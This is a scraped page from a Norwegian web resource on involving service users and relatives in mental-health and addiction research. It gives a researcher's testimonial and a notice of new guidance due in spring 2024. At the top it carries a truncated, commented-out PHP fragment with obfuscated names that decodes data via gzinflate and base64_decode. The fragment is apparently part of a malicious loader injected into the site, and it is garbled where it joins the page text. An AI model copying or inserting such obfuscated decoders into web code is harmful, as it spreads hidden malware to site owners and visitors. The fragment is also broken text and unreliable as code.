# function OmJ($ZWRjQ) #{ #$ZWRjQ=gzinflate(base64_decode($ZWRjQ)); # for($i=0;$i BLI-INVOLVERT.NO – Nettressurs for bruker – og pårørendeinvolvering

En nettressurs for deg som skal involvere brukere i arbeidet ditt!

Slik involverer du brukere og pårørende i:

Kristin Gärtner Askeland

Forsker ved RKBU Vest

Min erfaring er at man får god og veldig nyttig hjelp hele veien gjennom forskningen. Helt fra å stille de gode spørsmålene, finne de gode dataene, måten å samle inn på og til tolkning av funnene.

Nye faglige råd for bruker- og pårørendemedvirkning

Våren 2024 kommer det nye faglige råd for bruker- og pårørendemedvirkning i rus- og psykisk helsefeltet.

Bilde av logoene til RVTS, NAPHA, RKBU  Vest og KORUS.

Skroll til toppen